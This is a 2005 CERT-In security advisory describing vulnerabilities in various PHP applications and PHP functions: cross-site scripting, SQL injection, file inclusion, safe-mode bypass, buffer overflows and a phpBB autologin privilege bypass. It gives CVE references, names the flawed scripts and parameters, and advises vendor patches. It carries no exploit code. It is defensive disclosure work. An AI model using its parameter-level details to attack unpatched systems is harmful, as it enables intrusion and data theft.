HOME > ADVISORIES


   ADVISORIES

CERT-In Advisory CIAD-2005-07
Multiple vulnerabilities in PHP

Original issue date: March 14, 2005 .

Systems Affected

  • PHP Arena, paBox 1.6
  • PHP Gift Registry 1.x
  • PHP Group 4.0
  • PHP BB Group 2.0.12 and Prior
  • PHP MyAdmin 2.6.1
  • PHP MyFAQ 1.4, 1.5
  • PHP News 1.2.4
  • PHP Outsourcing , Zorum 3.5

Overview

Multiple vulnerabilities have been discovered in various PHP applications.

Impact

  • Information Disclosure
  • Data Manipulation
  • Denial of Service
  • Arbitrary Code Execution
  • Security Bypass
  • Cross site Scripting
  • SQL injection

Description

1) PHP Arena paBox Cross-Site Scripting Vulnerability

CVE Reference: CAN-2005-0674

paBox is a PHP/mySQL shoutbox script, where users visiting the site can post their messages. A cross site scripting vulnerability exists in paBox. A remote user can submit malicious text with a hidden POST variable set to ‘text'. When viewed the arbitrary scripting code is executed in the user's browser with the security context of site running paBox software, allowing remote user to access target user cookies and recently submitted data via web form to the site.

2) PHP Gift Registry Parameter Input Validation

CVE Reference: CAN-2005-0292

PHP Gift Registry is a web enabled gift registry. The index.php script does not properly sanitize the input parameters passed as ‘messageid','shopper' or ‘shopfor', and item.php does not properly sanitize the input parameter passed as ‘itemid'. A remote attacker can execute arbitrary SQL commands by sending crafted malicious HTTP packets.

3) PHP cURL Open_Basedir Restriction Bypass Disclaimer

CVE Reference: CAN-2004-1392

The vulnerability in PHP cURL module allows malicious users to bypass Open_Basedir restrictions and access arbitrary files.

4) PHP Multiple Remote Vulnerabilities.

CVE Reference:

CAN-2004-1018
CAN-2004-1063
CAN-2004-1064
CAN-2004-1019
CAN-2004-1020
CAN-2004-1065

Multiple vulnerabilities have been reported in various php functions.

A buffer overflow vulnerability exits in PHP 'pack()' function call. An attacker may exploit this condition to execute arbitrary instructions in the context of the vulnerable process.

An integer overflow vulnerability exists in PHP ‘unpack()' function . An attacker may exploit this condition to gain sensitive information.

The PHP safe mode function vulnerability allows malicious attacker to bypass PHP safe_mode_exec_dir security restrictions by injecting shell commands in current directory.

The Security bypass vulnerability in safe mode function may allow malicious attacker to execute arbitrary code that are otherwise restricted by PHP safe_mode.

A vulnerability in PHP safe mode function combined with certain implementations of realpath() , due to improper truncation file names may lead to file name inclusion vulnerability in certain cases.

A vulnerability in php ‘unserialize()' may allow attacker to supply malicious data leading to system information disclosure or causing Denial of Service attack.

A vulnerability in php addslashes function due to which it does not properly escape the NULL ‘/0' character, may allow attacker to read arbitrary files in php applications

A boundary error condition in exif_read_data function may allow a remote attacker to cause buffer overflow attack.

4) phpBB "autologinid" Security Bypass and information disclosure

CVE Reference:
CAN-2005-0603
CAN-2005-0603

A vulnerability in viewtopic.php is due to error in comparison of the "sessiondata['autologinid']" and "auto_login_key" and allows user to gain administrative privileges on vulnerable system.

The input validation error in viewtopic.php highlight parameter leads to disclosure of path information.

5) phpBB Signature Script Insertion Vulnerability.

CVE Reference: CAN-2005-0673

A cross site scripting vulnerability in "privmsg.php" and "viewtopic.php, due to input validation error may allow a remote attacker to inject malicious HTML and script code which is executed in user's browser session in context of an affected site.

6) phpBB Group phpBB 'oracle.php' Information Disclosure.

CVE Reference: CAN-2005-0659

A vulnerability in ‘oracle.php' may allow a remote user to determine installation path, via direct request to the oracle.php.

7) phpMyAdmin Cross-Site Scripting and Information Disclosure Vulnerabilities.

CVE Reference:

CAN-2005-0543
CAN-2005-0544
CAN-2005-0567

Multiple vulnerabilities in phpMyAdmin functions may allow a remote attacker to conduct cross site scripting attacks and gain sensitive information. The vulnerability is due to input validation errors in "select_server.lib.php", "display_tbl_links.lib.php", "theme_left.css.php", "theme_right.css.php", "phpmyadmin.css.php", and "database_interface.lib.php."

8) phpMyFaq SQL Injection Vulnerability.

CVE Reference: CAN-2005-0702

An input validation error in "username" field in forum messages, may allow remote attacker to cause SQL injection attack.

9) PHPNews 'auth.php' Flaw Permits Remote Code Execution.

CVE Reference: CAN-2005-0632

The input validation error in auth.php path parameter may allow including arbitrary files from external and local resources. This can be exploited by malicious users to compromise vulnerable system.

10) PhpOutsourcing Zorum Cross-Site Scripting Vulnerability.

CVE Reference:

CAN-2005-0675
CAN-2003-1088
CAN-2005-0676
CAN-2005-0677

An input validation error in the 'list', 'method', and 'frommethod' parameters, may allow remote attacker to gain elevated privileges or to cause cross site scripting attack.

Solution:

Apply the patch or workaround suggested by vendor.

References:

Secunia Advisories:

http://secunia.com/advisories/14474

http://secunia.com/advisories/13873
http://secunia.com/advisories/13420/
http://secunia.com/advisories/14413
http://secunia.com/advisories/14475
http://secunia.com/advisories/14382
http://secunia.com/advisories/14516
http://secunia.com/advisories/14449
http://secunia.com/advisories/9497

The information provided herein is on "as is" basis, without warranty of any kind.

Disclaimer

The information provided herein is on "as is" basis, without warranty of any kind.

Contact Information


Phone: +91 11-24368572

Postal address

Indian Computer Emergency Response Team (CERT-In)
Ministry of Communications and Information Technology
Electronics Niketan
6, C.G.O. Complex
New Delhi-110 003